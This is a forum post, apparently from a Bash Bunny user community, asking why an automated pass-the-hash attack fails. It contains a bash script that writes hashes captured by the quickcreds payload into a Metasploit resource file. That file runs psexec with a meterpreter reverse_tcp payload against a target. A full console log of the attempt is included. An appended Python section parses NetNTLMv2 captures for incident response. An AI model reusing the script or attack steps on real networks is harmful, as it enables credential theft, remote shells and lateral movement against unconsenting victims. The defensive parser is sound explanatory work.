Maestropastelero Posted October 23, 2017

This is not a 100% Bash Bunny topic, but it is related and I think all the newbies like me could be interested.

I've used Metasploit on a Kali laptop with a post mimikatz module loaded and dumped NTLMv2 hashes fine. I took a superuser account hash and used exploit/windows/smb/psexec to access other computers on the same network. Then I realized I could set up msf on my BB.

Running v1.3 on my BB, I set up Metasploit following this guide: https://steemit.com/technology/@cronetos/install-metasploit-framework-on-the-bash-bunny-or-other-debian-related-distros

First it melted my brain, as it didn't work and I am not super skilled in these matters, but after some gem uninstalls/installs/downgrades I finally made it work.

Then I used the quickcreds payload to get the hashes through the USB, and when that is done, I build an RC file that I pass to msfconsole -r. So far so good. Metasploit takes about a minute to load, but it works.

The problem is when it tries to exploit: I always get

Login Error: execution expired

The main question is: are the hashes from hashdump somehow different from the hashes that quickcreds provides? (I hope that doesn't sound too newbie.) Or does anyone see anything wrong with what I am doing here?

This is the log I got from Metasploit:

=[ metasploit v4.15.7-dev-70a82b5 ]
+ -- --=[ 1674 exploits - 960 auxiliary - 295 post ]
+ -- --=[ 489 payloads - 40 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing /root/udisk/loot/quickcreds/LAPTOP1/conf.txt for ERB directives.
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> use exploit/windows/smb/psexec
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set LHOST 172.16.64.1
LHOST => 172.16.64.1
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set LPORT 443
LPORT => 443
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set RHOST 172.16.64.10
RHOST => 172.16.64.10
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBUser myusername
SMBUser => myusername
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBPass df201f7e84ef06aa:7C3A900BB41C05C66F3BE717CF1F8FCB
SMBPass => df201f7e84ef06aa:7C3A900BB41C05C66F3BE717CF1F8FCB
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBDomain OFFICEDOMAIN
SMBDomain => OFFICEDOMAIN
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> exploit -j
[*] Exploit running as background job.
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> sleep 20
[*] Started reverse TCP handler on 172.16.64.1:443
[*] 172.16.64.10:445 - Connecting to the server...
[*] 172.16.64.10:445 - Authenticating to 172.16.64.10:445|OFFICEDOMAIN as user 'myusername'...
[-] 172.16.64.10:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: execution expired

---------------------------------------------------------------------------------------------------

This is what I added to the payload to test it (ugly code, it is just a test):

echo "use exploit/windows/smb/psexec" > $LOOTDIR/$HOST-$COUNT/conf.txt
echo "set payload windows/meterpreter/reverse_tcp" >> $LOOTDIR/$HOST-$COUNT/conf.txt
echo "set LHOST 172.16.64.1" >> $LOOTDIR/$HOST-$COUNT/conf.txt
echo "set LPORT 443" >> $LOOTDIR/$HOST-$COUNT/conf.txt
echo "set RHOST ${TARGET_IP}" >> $LOOTDIR/$HOST-$COUNT/conf.txt
head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* | awk -F':' '{print "set SMBUser "$1}' >> $LOOTDIR/$HOST-$COUNT/conf.txt
head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* | awk -F':' '{print "set SMBPass "$4":"$5}' >> $LOOTDIR/$HOST-$COUNT/conf.txt
head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* | awk -F':' '{print "set SMBDomain "$3}' >> $LOOTDIR/$HOST-$COUNT/conf.txt
echo "exploit -j" >> $LOOTDIR/$HOST-$COUNT/conf.txt
export HOME=/root
source /etc/profile.d/rvm.sh
cd /root/metasploit-framework/
./msfconsole -r $LOOTDIR/$HOST-$COUNT/conf.txt &>> /root/msf.log
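As an added note and example (not the poster's code): quickcreds stores Responder-style NetNTLMv2 capture lines in the form user::DOMAIN:server-challenge:NTProofStr:blob, whereas hashdump stores LM:NT hash pairs, which is the form psexec's SMBPass accepts. The parser below tells the two artifacts apart and decodes the client timestamp carried inside the NTLMv2 blob, which is what an incident responder wants to know about a capture found in a loot directory. The sample line, its user, domain and hex values are all constructed for this example.

```python
"""Tell an NT hash pair apart from a NetNTLMv2 challenge/response capture."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

HEX = r"[0-9a-fA-F]"
NT_PAIR = re.compile(rf"^{HEX}{{32}}:{HEX}{{32}}$")  # LM:NT, the hashdump form

@dataclass
class NetNtlmV2:
    user: str
    domain: str
    server_challenge: bytes  # 8 bytes chosen by the server for this one session
    nt_proof: bytes          # 16 bytes: HMAC-MD5 over server challenge and blob
    blob: bytes              # NTLMv2_CLIENT_CHALLENGE structure
    timestamp: datetime      # client clock (FILETIME) copied from the blob

def parse_netntlmv2(line: str) -> NetNtlmV2:
    """Parse the user::DOMAIN:challenge:proof:blob line that Responder writes."""
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        raise ValueError("not a NetNTLMv2 capture line")
    user, _, domain, chal, proof, blob = parts
    if len(chal) != 16 or len(proof) != 32 or len(blob) < 48 or len(blob) % 2:
        raise ValueError("field lengths do not match NetNTLMv2")
    blob_b = bytes.fromhex(blob)
    # Blob header: RespType 0x01, HiRespType 0x01, six reserved zero bytes.
    if blob_b[:8] != b"\x01\x01" + b"\x00" * 6:
        raise ValueError("blob lacks the NTLMv2 response header")
    filetime = int.from_bytes(blob_b[8:16], "little")  # 100 ns ticks since 1601
    ts = datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)
    return NetNtlmV2(user, domain, bytes.fromhex(chal), bytes.fromhex(proof), blob_b, ts)

def classify(secret: str) -> str:
    """Label what a loot line actually is before anything downstream consumes it."""
    if NT_PAIR.match(secret):
        return "nt-hash-pair"             # password-equivalent secret
    try:
        parse_netntlmv2(secret)
        return "netntlmv2-response"       # bound to one server challenge
    except ValueError:
        pass
    if re.fullmatch(rf"{HEX}{{16}}:{HEX}{{32}}", secret):
        return "challenge-and-proof"      # the awk '$4":"$5' slice from the thread
    return "unknown"

# Constructed sample (made-up values); the embedded FILETIME is 2017-10-23 00:00 UTC.
SAMPLE = ("alice::CORP:1122334455667788:0123456789abcdef0123456789abcdef:"
          "0101000000000000" "00008dde914bd301" "8899aabbccddeeff" "00000000"
          "0200080043004f0052005000" "00000000" "00000000")
```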